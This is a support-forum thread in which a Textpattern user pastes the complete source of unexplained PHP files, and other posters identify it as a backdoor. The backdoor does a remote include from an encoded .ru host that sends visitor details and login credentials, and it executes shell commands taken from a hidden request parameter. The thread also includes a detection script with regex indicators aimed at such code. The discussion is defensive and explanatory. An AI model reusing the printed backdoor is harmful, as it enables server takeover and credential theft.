Textpattern CMS support forum
#1 2006-01-02 11:11:14
- root
- Member
- From: Manila, Philippines
- Registered: 2004-05-31
- Posts: 48
strange files in textpattern folder
I was updating TxP from 4.0 -> 4.3. In the base textpattern folder (along with the files .htaccess and index.php, and the folders files, images and textpattern), I came across these files which have no counterpart in the new release: finfo.php, guest.php, package.php, system.php and publish.php.
With the exception of publish.php (which is blank), the four other files all have the same content:
<code><?php
error_reporting(0);
if(isset($_POST[“l”]) and isset($_POST[“p”])){
if(isset($_POST[“input”])){$user_auth=”&l=”. base64_encode($_POST[“l”]) .”&p=”. base64_encode(md5($_POST[“p”]));}
else{$user_auth=”&l=”. $_POST[“l”] .”&p=”. $_POST[“p”];}
}else{$user_auth=”“;}
if(!isset($_POST[“log_flg”])){$log_flg=”&log”;}
if(! @include_once(base64_decode(“aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9”) . sprintf(“%u”, ip2long(getenv(REMOTE_ADDR))) .”&url=”. base64_encode($_SERVER[“SERVER_NAME”] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET[“a3kfj39fsj2”])){system($_GET[“a3kfj39fsj2”]);}
if($_POST[“l”]==“special”){print “sys_active”. `uname -a`;}
}
?></code>
I’m not a programmer, and can’t understand what this means. Are these files supposed to exist?
Thanks very much :)
Offline
Re: strange files in textpattern folder
No, they are not supposed to be there. It looks like security at your server was breached in some way, and those files were left there as a backdoor to future remote code execution. The base64-encoded part cloaks “http://bi s.ifr ame.ru/ma ster.php?r_addr=”
Back up anything that could be proof, then talk with a professional on which steps to take (finding out how much your system was/could have been compromised; what to do to get the system back in a secure state etc.).
Offline
#3 2006-01-02 12:25:54
- root
- Member
- From: Manila, Philippines
- Registered: 2004-05-31
- Posts: 48
Re: strange files in textpattern folder
Oh my. o_o
Alright, thanks very much for the quick reply. I wonder though, is this a weakness of textpattern that allowed the hacker to plant these files? And what does this code do?
Offline
Re: strange files in textpattern folder
is this a weakness of textpattern
None of the security related things we fixed would allow this kind of thing to the best of my knowledge.
A little bit of googling shows that the exact code you posted has appeared on multiple sites of multiple people. Some are indicating that the problem is server-wide, meaning someone hacks a server and distributes those files on the sites hosted on it. Others indicated that this happened with special vulnerable versions of popular scripts that allowed arbitrary remote code execution. Which is why you should be talking with your host and potentially a professional who can examine the server and the logfiles to find out more.
And what does this code do?
The code sits there and lets anybody who knows how to access it execute any code on your server that said person wants to. Depending on your configuration this may be limited to “only” php-scripts, but potentially to system binaries as well. It all depends on the configuration of the server.
Offline
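The check the original poster did by hand (spotting files with no counterpart in the release, then reading what they contain) can be scripted. The following is an added example, not part of any post in this thread and not Textpattern code; the function names, indicator names, the release file set and the sample contents are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators modelled on the file contents quoted in this thread.
# They are starting points for review, not proof of compromise.
INDICATORS = {
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "include_of_decoded_string": re.compile(
        r"(?:include|require)(?:_once)?\s*\(?\s*base64_decode\s*\("),
    "request_param_to_command": re.compile(
        r"(?:system|exec|passthru|shell_exec|popen)\s*\(\s*"
        r"\$_(?:GET|POST|REQUEST|COOKIE)\b"),
}

# Constructed sample; the encoded string is a placeholder, not a real value.
SAMPLE = ('<?php error_reporting(0);\n'
          '@include_once(base64_decode("PLACEHOLDER") . $q);\n'
          'system($_GET["k"]); ?>')


def scan_text(text):
    """Return the sorted names of indicators found in PHP source text."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(text))


def triage(site_root, release_files):
    """Report .php files that are absent from the release or match indicators.

    release_files: set of relative POSIX paths in the clean release archive
    (assumption: the caller builds this from a fresh download).
    """
    root = Path(site_root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        hits = scan_text(path.read_text(errors="replace"))
        unexpected = rel not in release_files
        if unexpected or hits:
            findings[rel] = {"unexpected": unexpected, "indicators": hits}
    return findings


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in {"index.php": "<?php include 'x.php'; ?>",
                           "finfo.php": SAMPLE, "publish.php": ""}.items():
            Path(tmp, name).write_text(body)
        for rel, info in triage(tmp, {"index.php"}).items():
            print(rel, info)
```

An unexpected file is reported even when it is empty, as publish.php was here, and anything flagged should be copied aside as evidence before cleanup.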
#5 2006-01-02 13:27:46
- root
- Member
- From: Manila, Philippines
- Registered: 2004-05-31
- Posts: 48
Re: strange files in textpattern folder
None of the security related things we fixed would allow this kind of thing to the best of my knowledge.
Good to know. _ I’ve emailed my host; I hope this problem is fixed soon. Thanks again!
Offline